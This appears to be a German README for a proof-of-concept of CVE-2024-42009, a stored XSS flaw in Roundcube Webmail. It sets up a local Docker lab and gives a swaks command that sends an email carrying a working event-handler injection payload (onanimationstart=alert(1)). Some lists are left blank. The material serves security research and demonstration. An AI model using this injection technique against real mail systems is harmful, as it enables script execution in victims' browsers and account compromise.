
Dieses Repository demonstriert einen funktionierenden Proof-of-Concept (PoC) für CVE-2024-42009, eine Stored Cross-Site Scripting (XSS)-Sicherheitslücke in Roundcube Webmail.
Die Sicherheitslücke wird durch eine fehlerhafte HTML-Bereinigung mit anschließender unsicherer Attribut-Wiederverarbeitung verursacht, die es Angreifern ermöglicht, über manipulierte HTML-E-Mails bösartige Event-Handler einzuschleusen.
Roundcube bereinigt eingehende HTML-E-Mails, verarbeitet jedoch später bestimmte Attribute erneut (z. B. bgcolor, fehlerhafte Attribute), was zu Folgendem führt:
onanimationstart)Dies ermöglicht die Ausführung beliebigen JavaScripts, wenn ein Opfer eine bösartige E-Mail öffnet.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ Warten Sie ~10–15 Sekunden, bis der Mailserver initialisiert ist.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
Zugangsdaten:
Senden Sie die bösartige E-Mail mit dem swaks-Tool:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


Aktualisieren Sie auf gepatchte Versionen:
Dieses Projekt dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie es nicht gegen Systeme ohne entsprechende Genehmigung.